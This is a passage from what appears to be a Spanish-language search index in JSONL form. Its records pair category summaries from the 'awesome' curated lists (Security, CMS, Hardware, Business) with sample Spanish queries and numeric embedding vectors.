-0.1145, 0.137, -0.02725, -0.0591, -0.02159, 0.02148, -0.04685, 0.01406, 0.02027, 0.08665, -0.03581, 0.01116, 0.02798, 0.10565, 0.06358, -0.02442, 0.05892, -0.09108, -0.02127, -0.10813, -0.00517, -0.08517, 0.01172, 0.01006, -0.1041, -0.01632, 0.0332, -0.04702, 0.04291, -0.01498, 0.02482, 0.04028, -0.02312, -0.02024, -0.06546, -0.04097, 0.02489, 0.03262, 0.00356, -0.06391, -0.03122, -0.06588, -0.03389, 0.0079, -0.0518, -0.09795, -0.00052, 0.06098, -0.10066, -0.01197, -0.0075, 0.0666, 0.0667, -0.02064, 0.05576, -0.05071, -0.07408, -0.05492, -0.00228, -0.01332, 0.01828, -0.02295, 0.07649, 0.08467, 0.03507, 0.03295, -0.02083, -0.01024, -0.01838, 0.05688, -0.00669, 0.00504, 0.00637, 0.03011, -0.02322, 0.02033, 0.06087, 0.00897, -0.02876, -0.02498, 0.00785, -0.03884, 0.03312, 0.05994, -0.00688, -0.03788, -0.03358, 0.00517, -0.04715, -0.0377, -0.02425, -0.03414, -0.06331, 0.03976, 0.02586, 0.03585, 0.02267, -0.02073]} -{"tipo": "pregunta", "herramienta": "Security", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Security", "tema": "security", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Security: Malware Persistence β€” Techniques that adversaries use to keep access to systems across restarts. EVM Security β€” Understanding the Ethereum Virtual Machine security ecosystem. Password Cracking β€” The process of recovering passwords from data that has been stored in or transmitted by a system in scrambled form. Security Card Games β€” Train your skills and discuss various security topics. Suricata β€” Intrusion detection/prevention system and network security monitoring engine. Prompt Injection β€” A type of vulnerability that specifically targets machine learning models. Detection Engineering β€” Design, build, and operate detective cybersecurity controls. Annual Security Reports β€” Exploring cybersecurity trends, insights, and challenges. CI/CD Attacks β€” Offensive research of systems and processes related to developing and deploying code. OpenID Connect β€” Identity standard and authentication protocol built on OAuth 2.0 for user identity assertion.", "indexar": "como puedo diseΓ±ar controles cibernΓ©ticos detectivos?", "v": [0.07478, -0.07764, -0.16848, -0.14365, 0.18838, 0.02677, -0.00847, 0.06492, -0.07142, -0.18092, -0.03737, 0.02408, -0.19202, -0.21542, 0.15225, 0.03225, 0.15447, -0.04121, -0.03871, -0.06666, 0.04841, -0.08823, -0.06661, -0.0408, 0.04245, 0.03505, -0.07367, -0.00715, -0.05873, 0.08926, -0.04117, -0.00786, 0.09802, 0.04479, -0.12843, -0.01741, -0.07852, 0.00875, 0.09148, 0.07934, 0.03198, 0.01273, -0.02897, 0.00498, 0.08011, -0.02215, 0.02588, -0.02916, -0.05873, 0.00087, -0.03996, 0.12463, -0.12753, 0.0513, 0.0049, -0.07615, 0.03826, 0.0036, 0.12548, -0.14444, 0.02566, -0.04047, 0.10476, 0.135, 0.01657, -0.00466, -0.03662, -0.05415, -0.09705, 0.00662, 0.07098, 0.01736, 0.00225, 0.00242, 0.06763, -0.04469, 0.02512, -0.02949, 0.2037, -0.07329, -0.07074, -0.00038, -0.03998, 0.01703, -0.04995, -0.02354, -0.10581, -0.11836, -0.10191, -0.07984, -0.02319, -0.04226, -0.03399, 0.00112, -0.07128, 0.08782, 0.07109, 0.03375, -0.00622, 0.08858, 0.00574, -0.0502, -0.05525, 0.08856, 0.03278, 0.02892, 0.06723, 0.03417, 0.01351, -0.07058, -0.05322, -0.02552, -0.02367, -0.10972, -0.00886, 0.02726, 0.03627, -0.02602, -0.00501, -0.02349, -0.05603, -0.06723, -0.03357, 0.00506, 0.06684, -0.06753, -0.05962, 0.0798, -0.02412, 0.04848, 0.00149, 0.02207, -0.02015, -0.00245, 0.00018, 0.1148, -0.05381, -0.05451, -0.02359, 0.06429, -0.00573, 0.09201, 0.04019, 0.02498, 0.04907, 0.00781, -0.03987, 0.01465, -0.06721, -0.00218, -0.0143, 0.09559, 0.00151, 0.03657, -0.04514, 0.05641, -0.0292, -0.00354, 0.03312, 0.05365, -0.05187, 0.06984, -0.03587, 0.0105, 0.11127, 0.00413, 0.02464, -0.0414, 0.03452, 0.04755, -0.01111, -0.02887, -0.01824, -0.06837, 0.00465, -0.02871, -0.01112, -0.10019, 0.01388, -0.11697, -0.01933, 0.075, -0.0525, 0.00237, -0.01889, -0.00985, 0.02052, 0.04603, 0.0364, 0.05715, 0.01345, 0.05647, 0.00502, 0.05286, -0.00126, -0.02062, 0.12115, 0.03365, -0.02691, -0.06706, 0.00172, -0.04516, -0.0144, -0.05336, -0.03736, -0.00694, 0.01578, 0.06695, -0.01129, 0.00017, 0.02344, -0.08479, 0.06292, -0.01615, -0.02074, 0.03744, 0.03723, -0.01675, 0.04004, -0.03375, 7e-05, 0.03541, 0.03782, 0.03554, 0.02692, 0.02, 0.01245, 0.04836, 0.04721, 0.05539, 0.06296, -0.03666, -0.05567, 0.02175, 0.01514, -0.02309, -0.01001, -0.03532, -0.01601, -0.03346, -0.00343, 0.10995, -0.03398, -0.06241, -0.00866, -0.09685, -0.03652, -0.02956, -0.06453, -0.06736, 0.01602, 0.05171, 0.08362, -0.06017, -0.02154, -0.03587]} -{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "que sistema de gestiΓ³n de contenidos es ligero y fΓ‘cil de usar?", "v": [-0.04901, 0.05851, -0.12433, -0.15824, 0.08849, -0.07854, -0.1533, -0.04009, -0.15035, -0.09262, -0.15945, -0.0696, -0.09386, -0.03926, 0.10725, -0.03702, 0.01607, -0.16924, -0.12752, -0.04561, -0.05171, -0.04309, -0.05953, -0.00396, -0.09884, 0.02768, 0.15603, -0.21484, -0.09409, 0.06815, -0.06109, 0.07584, 0.06348, 0.03018, -0.07839, -0.02065, -0.02507, 0.10504, -0.02978, 0.07412, 0.08199, -0.04856, -0.03586, 0.06262, 0.05058, -0.03668, 0.11793, 0.01355, 0.01897, -0.03929, -0.05596, -0.06255, -0.12136, -0.05101, 0.01162, -0.10062, 0.03827, -0.08001, 0.05206, -0.08174, -0.04588, 0.08013, 0.05099, 0.06862, -0.06262, -0.05192, 0.00845, 0.03876, -0.10469, 0.10609, 0.06902, -0.00902, 0.08242, 0.04685, 0.07725, 0.0367, -0.00155, 0.03089, -0.0417, 0.08273, 0.05325, -0.09547, -0.03821, 0.0853, -0.14297, -0.10479, 0.07132, -0.08873, 0.00554, -0.05913, 0.02263, -0.09662, 0.0562, -0.07794, 0.00764, -0.01763, -0.00492, -0.03007, 0.01464, 0.03266, 0.05496, 0.01143, -0.04228, 0.06123, -0.02926, 0.00671, 0.07615, -0.08027, 0.00713, -0.05128, -0.03641, -0.04127, -0.04908, -0.07049, -0.08282, 0.07715, 0.02275, -0.00178, -0.03446, -0.05709, -0.05927, -0.02045, 0.06095, -0.10779, 0.16393, 0.01054, 0.08204, 0.06555, -0.02062, 0.03088, 0.00085, -0.07814, -0.10783, 0.02499, -0.03551, -0.05523, -0.00403, 0.07074, 0.01386, 0.01785, -0.06389, 0.06699, -0.07394, -0.03769, 0.07699, -0.05896, 0.10154, -0.04892, 0.00306, 0.03641, -0.02607, -0.08751, -0.01545, -0.04125, -0.0558, 0.02885, 0.0273, -0.05532, -0.0889, -0.02396, -0.0749, -0.02124, 0.00487, 0.07938, 0.00797, -0.03374, -0.03027, -0.02739, 0.01455, 0.00651, 0.01613, 0.08496, 0.01366, -0.01947, 0.03837, -0.06948, -0.08992, -0.08604, -0.006, 0.01723, -0.05972, -0.00372, -0.01483, 0.08591, 0.00505, 0.00983, -0.02473, 0.05301, -0.03856, 0.04479, 0.03406, 0.06434, 0.02249, 0.04005, 0.03368, 0.00325, -0.04372, -0.04893, 0.0073, -0.01445, -0.0649, 0.03987, 0.007, -0.07039, -0.03064, 0.02209, 0.016, 0.0022, 0.0393, 0.08391, 0.01958, 0.0196, 0.04652, -0.01218, -0.02085, 0.02492, 0.00588, 0.02662, -0.00717, -0.03415, 0.0356, 0.01939, 0.00766, 0.05429, 0.01288, -0.02675, 0.00506, 0.00423, 0.00586, -0.04352, -0.03533, -0.06227, 0.02139, -0.01316, -0.01828, -0.08291, 0.02122, -0.03262, -0.06324, -0.06548, 0.00077, 0.1364, 0.04223, 0.004, -0.01938, -0.04581, -0.09477, 0.00258, -0.04905, -0.09244, -0.01344, -0.04996, 0.03166, -0.03651, -0.01415, 0.0166]} -{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "cual me sirve si necesito montar una web con mucha flexibilidad para el usuario final?", "v": [-0.03173, 0.09372, -0.30421, -0.04554, -0.10936, -0.09613, -0.23862, 0.02645, -0.09311, -0.1707, -0.03496, -0.07509, 0.02138, -0.0198, -0.08788, -0.06289, 0.03441, -0.08414, 0.07497, 0.09247, 0.01017, -0.17261, -0.05253, -0.10265, -0.07085, 0.05347, 0.11151, -0.08326, -0.16325, 0.05216, 0.02473, 0.13324, 0.00572, -0.00059, 0.00391, 0.03849, 0.04342, -0.02134, -0.07318, 0.05432, 0.0762, 0.00196, -0.09547, 0.05243, 0.02949, 0.09333, 0.01441, -0.11024, -0.03205, 0.0898, 0.14741, 0.01414, -0.08618, 0.03858, -0.05029, -0.08076, 0.17898, -0.12815, 0.03785, -0.00955, -0.0658, 0.00537, 0.05318, 0.12723, -0.00794, -0.06941, -0.08946, 0.02743, -0.03444, -0.00191, -0.04175, 0.02643, 0.01704, -0.07106, 0.00477, 0.09364, -0.0025, -0.00448, 0.07692, 0.05941, 0.07008, 0.02324, -0.0653, -0.02145, -0.09536, -0.01295, 0.12673, -0.05441, 0.0947, -0.00156, 0.0773, 0.07479, -0.01926, -0.07885, -0.0229, -0.2036, 0.08132, 0.11144, -0.03412, -0.01284, -0.01968, 0.04716, -0.02368, 0.04442, 0.0074, -0.0146, 0.01126, -0.0526, -0.04342, 0.03542, 0.0782, 0.06993, -0.06932, -0.05924, -0.00377, -0.02719, -0.02794, -0.03877, -0.0194, 0.01063, -0.02784, 0.03616, 0.07371, -0.03378, 0.01337, 0.02174, 0.11813, 0.06959, -0.03619, -0.03143, -0.03591, -0.06228, -0.08854, 0.00495, 0.03214, 0.03379, 0.03479, -0.01617, -0.04568, 0.03848, 0.0528, -0.08199, -0.08064, -0.02287, 0.01565, 0.00061, 0.06998, -0.01488, -0.08458, -0.02948, -0.01124, 0.00065, -0.00161, -0.00852, -0.06846, -0.00987, -0.0699, -0.01332, -0.0, 0.0518, 0.01961, 0.0057, 0.02514, 0.00517, -0.02884, -0.04384, -0.09411, 0.02344, 0.01421, 0.02435, 0.02887, -0.01035, 0.00396, 0.0043, 0.11358, 0.00393, -0.07629, 0.02582, 0.00834, -0.04053, 0.02451, -0.02584, -0.0016, 0.07632, -0.03852, -0.04798, -0.01394, 0.05215, -0.00148, 0.09092, -0.00769, 0.01391, -0.03117, 0.0255, 0.07904, -0.04444, -0.00768, -0.04179, -0.00122, -0.06583, -0.01601, -0.01795, -0.04044, 0.00141, -0.00099, 0.04191, 0.01578, 0.03178, 0.07564, 0.05526, 0.01415, -0.03921, -0.00429, -0.03144, 0.01851, -0.04221, 0.05081, 0.00385, -0.00617, 0.01206, 7e-05, 0.00426, -0.01696, 0.01708, 0.0588, 0.05883, 0.00296, -0.05787, -0.03355, -0.01794, -0.00781, -0.00763, -0.04214, 0.00161, 0.03692, -0.0341, -0.0141, 0.00572, -0.02264, -0.04741, -0.01743, 0.08046, 0.00061, 0.00507, 0.01361, -0.03257, -0.07436, 0.01363, -0.09197, -0.07742, -0.04612, 0.00739, 0.01529, -0.03607, -0.01388, 0.02156]} -{"tipo": "pregunta", "herramienta": "Content Management Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Content Management Systems", "tema": "content management systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Content Management Systems: Umbraco. Refinery CMS β€” Ruby on Rails CMS. Wagtail β€” Django CMS focused on flexibility and user experience. Textpattern β€” Lightweight PHP-based CMS. Drupal β€” Extensible PHP-based CMS. Craft CMS β€” Content-first CMS. Sitecore β€” NET digital marketing platform that combines CMS with tools for managing multiple websites. Silverstripe CMS β€” PHP MVC framework that serves as a classic or headless CMS. Directus β€” A real-time API and app dashboard for managing SQL database content. Plone β€” Open source Python CMS. Payload β€” Next.js native and open source headless CMS.", "indexar": "hay alguna alternativa open source a Drupal o Sitecore que no requiera mucho mantenimiento?", "v": [-0.13903, 0.05583, -0.16091, -0.09377, -0.10693, -0.03366, 0.05696, -0.03625, -0.18527, -0.11867, -0.09005, -0.21603, 0.03259, -0.10544, 0.04653, -0.23486, 0.01147, -0.09139, 0.00398, -0.01229, -0.13484, -0.04359, -0.09062, -0.04514, -0.18768, -0.16735, -0.09222, 0.02615, -0.142, -0.033, 0.10718, 0.06016, 0.03891, 0.03122, -0.08596, -0.01206, 0.11486, -0.0386, 0.06423, -0.1351, -0.07618, -0.06921, -0.05705, 0.10887, 0.04743, -0.02315, -0.00929, 0.01733, -0.05288, 0.0019, -0.11712, 0.02432, -0.0613, -0.07649, 0.05986, 0.07658, 0.13357, -0.05603, 0.04918, -0.05254, -0.06355, -0.00356, 0.03324, -0.13529, -0.00578, 0.03823, 0.06528, 0.06538, -0.08505, 0.03678, 0.00057, -0.01955, 0.0543, -0.07618, -0.03651, -0.04502, 0.10806, -0.03254, -0.02533, 0.10963, -0.02793, 0.03973, 0.03915, 0.04515, -0.1072, -0.10462, -0.00434, -0.06253, -0.03185, -0.00818, 0.05946, 0.02885, -0.02104, 0.08243, -0.02298, -0.09189, -0.0231, 0.10096, 0.01896, 0.06521, 0.02733, 0.03027, 0.03134, -0.04573, 0.02216, -0.01142, 0.05989, -0.07943, -0.03685, 0.0712, 0.09633, 0.02729, 0.01196, 0.04713, -0.02571, 0.00286, -0.03496, -0.00782, -0.04048, -0.01507, -0.0601, -0.06254, -0.04025, 0.02123, -0.05377, -0.05057, 0.0937, -0.0272, -0.0505, 0.0002, -0.05813, -0.0845, -0.02064, 0.01569, -0.03749, 0.05103, 0.06546, 0.06099, 0.02657, 0.00719, -0.0099, -0.04021, 0.02773, -0.03252, 0.06035, -0.12301, 0.00605, 0.00345, 0.0184, -0.02984, -0.11575, 0.03128, -0.03062, 0.11335, -0.11561, 0.04615, 0.02035, 0.00144, -0.07035, 0.05951, -0.03594, -0.06404, -0.02911, 0.03875, -0.07271, -0.00997, -0.01236, 0.0614, 0.01598, 0.03178, 0.01703, 0.14756, 0.02206, -0.02728, 0.02389, 0.00182, 0.07523, -0.06195, 0.1069, -0.01102, 0.02646, -0.07949, -0.04116, 0.03734, 0.00941, -0.00685, -0.0155, -0.02908, -0.0489, 0.06344, -0.01235, 0.01375, -0.05989, -0.03456, 0.09201, -0.04698, 0.03489, -0.06519, 0.013, 0.02904, -0.08229, -0.00937, -0.00888, -0.01552, -0.03439, -0.00184, 0.00856, -0.02893, 0.03103, 0.02614, 0.0592, 0.0102, 0.00364, -0.01737, 0.00909, -0.04566, 0.0182, 0.01818, 0.0057, 0.01766, 0.02428, 0.03368, -0.01486, 0.0374, 0.06293, 0.02205, 0.0309, -0.01497, 0.0295, 0.05045, 0.00445, -0.01381, 0.01647, 0.0184, -0.00061, -0.03586, -0.06508, 0.01081, 0.0505, 0.01037, -0.02699, 0.00101, -0.00302, -0.03958, 0.03784, -0.02561, -0.03258, -0.0055, 0.00133, -0.05665, 0.01726, 0.0158, -0.00068, -0.00253, -0.00467, -0.02417]} -{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "que programa sirve para medir distancias con lΓ‘ser?", "v": [0.23409, -0.03597, -0.15297, -0.09477, 0.00461, 0.0078, -0.14685, 0.04782, -0.08524, 0.0195, 0.08133, 0.04236, 0.02312, -0.18093, 0.15213, 0.00974, 0.02763, -0.00739, -0.0359, -0.01353, 0.13407, 0.0759, -0.01895, -0.11882, -0.00464, 0.04016, 0.04073, -0.14881, -0.13577, -0.0417, -0.18308, 0.09795, 0.00499, -0.03789, -0.05415, -0.08233, -0.04166, 0.07971, -0.07961, -0.00152, -0.00511, 0.13083, 0.0856, -0.03005, 0.07402, -0.10521, -0.04822, 0.02613, 0.04324, -0.06026, -0.01629, 0.09139, 0.0882, 0.08102, -0.04333, -0.07079, -0.01105, 0.01565, -0.00896, -0.02563, -0.04984, -0.09892, 0.08838, 0.00904, 0.06255, -0.04241, 0.0502, -0.09097, -0.16, -0.0829, -0.03865, 0.00423, -0.02984, -0.03465, -0.04146, 0.07312, -0.065, -0.04339, 0.08125, -0.08886, -0.05239, -0.04118, 0.00721, 0.02877, -0.01529, -0.01347, 0.13631, -0.01289, -0.03869, -0.03715, -0.01189, 0.09371, 0.05544, 0.04747, -0.0101, -0.04237, 0.10635, 0.0552, -0.03777, 0.08871, 0.07071, -0.08405, -0.10234, 0.01719, -0.00738, 0.0987, 0.00219, -0.05748, -0.04513, 0.00033, 0.07448, 0.00402, -0.07053, -0.09304, -0.20736, 0.00726, -0.06176, 0.00054, 0.00865, -0.05895, -0.06658, 0.08872, -0.04825, 0.02026, 0.04455, -0.05939, -0.0714, 0.02072, -0.0477, 0.04431, -0.00527, 0.10093, -0.02435, 0.01002, -0.06575, -0.0285, 0.00089, -0.08818, -0.00317, 0.00161, 0.02518, 0.06048, 0.02951, -0.01762, -0.00543, -0.01849, 0.01815, -0.03854, -0.06596, 0.05014, -0.00532, -0.03458, 0.02357, 0.09657, -0.02833, -0.00719, 0.02235, -0.0641, -0.06115, 0.05933, -0.06902, 0.03777, 0.01318, -0.08183, 0.14751, -0.04399, 0.01415, 0.00019, 0.04453, 0.10109, -0.08347, 0.05165, 0.0374, -0.05809, -0.01166, -0.0071, 0.02404, -0.03301, 0.03804, -0.01942, -0.06863, 0.09377, 0.03532, 0.00352, -0.0079, 0.03221, -0.08718, 0.05037, 0.07265, 0.01008, -0.0374, -0.00249, 0.05239, -0.02536, 0.00652, -0.03166, 0.02556, -0.02735, 0.09514, -0.0148, -0.06822, -0.03658, 0.03016, -0.01415, 0.07139, 0.08599, 0.00133, 0.04523, 0.01793, 0.04951, 0.05223, -0.03656, 0.02968, 0.03117, -0.04505, 0.0071, 0.0853, -0.00189, 0.0554, 0.01796, -0.07381, -0.00537, -0.00377, 0.02777, 0.00318, -0.01771, 0.08023, -0.0272, 0.01504, -0.01586, 0.02072, -0.01748, 0.01988, -0.02105, 0.02096, -0.04145, 0.01586, -0.04791, 0.03148, -0.08334, -0.00236, 0.03227, -0.02228, -0.02794, -0.02209, -0.01202, -0.06934, -0.00657, 0.00501, -0.05398, -0.07359, 0.02967, 0.0356, 0.00151, 0.06695, 0.04111]} -{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "con que puedo diseΓ±ar o construir una herramienta robΓ³tica?", "v": [0.2357, -0.0726, -0.13136, -0.15941, 0.11849, -1e-05, -0.00395, 0.06478, -0.01483, -0.11066, -0.05125, -0.09939, 0.07211, -0.08333, 0.07661, 0.0302, 0.04303, -0.06148, -0.14649, 0.06352, 0.02699, -0.02421, -0.0408, 0.06401, 0.10036, -0.05195, 0.03339, 0.04999, -0.16945, 0.17656, 0.01232, 0.04874, 0.11629, -0.02897, -0.12246, -0.13914, 0.04629, -0.00811, 0.07284, -0.03013, -0.06048, 0.07771, -0.06939, 0.09161, 0.03681, 0.07322, 0.04882, -0.08463, -0.07357, 0.11169, -0.06546, -0.0367, -0.01832, -0.02527, 0.09236, -0.12855, 0.22032, -0.16491, -0.00158, -0.13205, -0.02753, -0.0061, 0.01001, -0.03802, 0.00667, 0.00832, -0.09726, -0.10256, -0.00308, -0.00243, 0.02388, -0.0678, -0.07608, -0.06593, 0.06677, 0.00867, -0.05695, 0.01993, 0.04572, -0.04772, -0.04082, -0.05959, -0.10106, -0.04203, 0.08031, 0.02474, 0.00539, -0.01293, 0.01653, -0.04129, -0.05327, 0.05771, -0.03851, 0.02912, -0.00022, 0.05728, 0.12746, -0.00231, 0.00185, 0.02017, 0.06284, -0.0816, -0.0786, 0.01962, -0.00292, 0.05833, 0.01652, -0.04232, 0.06742, -0.02066, 0.04242, -0.00233, 0.05025, -0.08324, -0.12022, 0.03182, -0.01755, -0.01821, -0.06324, -0.01465, 0.02872, 0.08681, -0.01354, -0.07555, 0.02113, 0.01051, -0.07318, 0.0845, -0.06802, -0.11014, -0.01657, 0.00569, -0.05376, -0.00161, -0.00893, 0.09954, 0.04067, -0.09385, -0.0363, -0.01725, 0.04273, 0.06836, 0.00153, -0.11828, -0.0946, 0.02747, -0.01565, -0.05185, -0.02041, -0.03027, -0.02352, 0.01435, 0.06805, 0.04868, -0.11011, -0.02492, -0.07802, 0.00196, -0.02593, 0.08967, -0.08817, 0.07942, -0.00611, 0.00511, 0.01335, -0.0512, 0.01094, 0.00123, 0.01477, 0.06479, 0.01786, 0.06246, 0.03774, 0.04723, 0.07024, -0.03839, -0.0101, -0.02563, -0.05203, -0.10547, -0.05025, 0.04748, -0.0287, -0.00298, -0.01238, -0.04898, 0.00409, -0.01086, 0.05224, 0.09202, -0.00728, -0.00096, 0.02029, 0.03294, 0.04613, -0.01254, 0.07118, 0.03957, -0.02744, -0.02694, -0.02172, -0.0024, 0.00447, -0.03103, -0.00135, 0.0406, 0.01938, 0.00137, -0.00797, 0.02186, 0.06109, -0.03345, 0.02705, -0.03148, 0.05518, 0.04249, 0.01414, 0.02463, 0.03251, -0.05278, 0.04131, -0.00258, 0.01302, -0.00643, 0.03218, 0.02751, 0.05421, 0.01993, -0.0185, 0.024, 0.0399, -0.04927, 0.00946, 0.00713, -0.02084, 0.00502, 0.00382, -0.03683, -0.04264, -0.02862, -0.01771, 0.11834, -0.07096, -0.04285, 0.02137, -0.0754, -0.0447, -0.04274, -0.07706, -0.06861, -0.04471, 0.06631, 0.06427, -0.06124, -0.01437, -0.00911]} -{"tipo": "pregunta", "herramienta": "Hardware", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Hardware", "tema": "hardware", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Hardware: Robotics. Internet of Things. Electronics β€” For electronic engineers and hobbyists. Bluetooth Beacons. Electric Guitar Specifications β€” Checklist for building your own electric guitar. Plotters β€” Computer-controlled drawing machines and other visual art robots. Robotic Tooling β€” Free and open tools for professional robotic development. LIDAR β€” Sensor for measuring distances by illuminating the target with laser light. Open Hardware β€” Open-source hardware projects. ADS-B β€” Technology broadcasting aircraft's identity, position, and data periodically. Flying FPV β€” Open hardware and software related to drones / UAVs.", "indexar": "cual es un proyecto open source para controlar un drone?", "v": [-0.04779, 0.03201, -0.153, -0.11416, 0.01285, -0.0593, 0.00567, 0.05168, -0.03542, -0.12584, -0.15868, -0.2053, 0.03342, -0.14039, -0.058, -0.12954, 0.13392, -0.03185, -0.05145, -0.00531, -0.20038, -0.08969, 0.02858, -0.1061, 0.00058, -0.06956, -0.06016, 0.03053, -0.14753, -0.01994, 0.03489, -0.03417, 0.16281, 0.1224, -0.01763, -0.07107, -0.01669, 0.15431, 0.14857, 0.08191, -0.14766, -0.05095, -0.07212, 0.09495, 0.10152, -0.00488, 0.0943, 0.032, -0.02083, -0.02543, -0.14811, 0.06306, -0.05724, 0.10993, 0.0516, -0.03432, 0.06676, -0.17168, 0.00815, -0.02294, -0.0782, -0.03655, 0.03206, -0.13505, -0.08708, -0.04143, 0.01664, 0.06097, -0.13462, -0.0101, 0.1055, 0.06092, 0.05428, -0.05121, 0.01073, -0.04414, -0.06378, -0.00956, 0.04089, -0.00023, -0.03856, -0.07167, -0.1225, -0.0183, -0.01475, -0.08457, 0.00093, -0.03377, -0.0253, 0.03654, 0.00548, 0.02221, 0.01278, 0.03871, 0.04388, 0.0037, 0.04226, -0.00053, -0.06411, -0.0073, -0.02517, -0.03861, -0.07662, 0.03552, 0.03611, 0.13493, 0.00374, -0.03791, -0.10132, 0.01725, -0.07237, 0.03762, 0.00976, 0.0167, -0.04713, -0.06103, -0.07934, 0.02797, 0.06975, -0.02254, -0.00314, -0.09684, -0.00808, -0.00677, 0.09099, -0.0086, -0.0316, 0.07327, -0.00068, 0.0469, 0.01559, 0.0114, 0.01463, -0.00186, -0.02514, 0.01952, 0.08237, -0.00689, -0.03473, 0.02675, -0.07104, 0.04123, 0.08441, -0.05191, 0.04488, -0.08088, -0.02482, -0.00718, 0.08982, -0.00787, -0.02387, 0.04144, 0.00665, 0.04863, -0.03738, 0.0322, -0.04375, -0.01635, -0.02368, 0.06923, -0.00662, 0.04223, 0.01515, -0.03697, 0.04173, -0.03306, -0.03276, -0.03005, 0.04735, 0.0378, -0.01996, 0.06045, -0.05064, 0.00254, 0.05013, -0.08965, 0.01121, -0.06167, 0.08529, -0.08657, -0.09659, 0.05783, 0.01614, 0.0863, 0.0341, -0.05099, 0.05168, 0.00781, 0.00412, 0.0987, -0.04468, 0.02473, 0.00862, -0.07553, 0.05714, -0.03497, -0.00715, 0.00242, 0.0194, 0.0051, 0.01231, -0.01751, 0.00585, -0.01442, -3e-05, 0.01791, -0.03545, 0.01403, 0.00695, 0.01315, 0.03708, -0.00665, 0.04269, -0.00328, -0.00485, 0.06863, -0.0265, -0.02052, 0.03518, -0.02034, 0.07251, -0.05307, 0.076, -0.01122, 0.04111, 0.01482, 0.03262, 0.07109, 0.02826, -0.01576, 0.00203, -0.00675, -0.01891, -0.00448, 0.01163, 0.00343, 0.01973, -0.01341, -0.05412, -0.02481, -0.02623, 0.11365, -0.04102, -0.05654, -0.04713, -0.03616, -0.09109, 0.04413, -0.02873, -0.08803, -0.0459, 0.06815, 0.05477, -0.05623, 0.00358, 0.00271]} -{"tipo": "pregunta", "herramienta": "Business", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Business", "tema": "business", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Business: Open Companies. Places to Post Your Startup. OKR Methodology β€” Goal setting & communication best practices. Indie β€” Independent developer businesses. Tools of the Trade β€” Tools used by companies on Hacker News. Clean Tech β€” Fighting climate change with technology. Wardley Maps β€” Provides high situational awareness to help improve strategic planning and decision making. Social Enterprise β€” Building an organization primarily focused on social impact that is at least partially self-funded. Engineering Team Management β€” How to transition from software development to engineering management. Developer-First Products β€” Products that target developers as the user. Billing β€” Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. Engineering Strategy β€” How to design and execute engineering strategies for tech leadership.", "indexar": "que herramienta sirve para gestionar la estrategia de ingenierΓ­a en equipos tΓ©cnicos?", "v": [0.07287, -0.02698, -0.1033, -0.28537, 0.1011, -0.14123, -0.08988, 0.00189, -0.01841, -0.04653, -0.06808, 0.0672, 0.01145, -0.04509, 0.11739, 0.10638, 0.15099, -0.14015, 0.00662, -0.00962, -0.07168, 0.09804, 0.0102, 0.01267, -0.08112, 0.01587, 0.00874, -0.0685, -0.21504, 0.04713, -0.0506, 0.06621, 0.12945, -0.11824, -0.01305, -0.0166, -0.04858, 0.09175, 0.013, 0.03044, 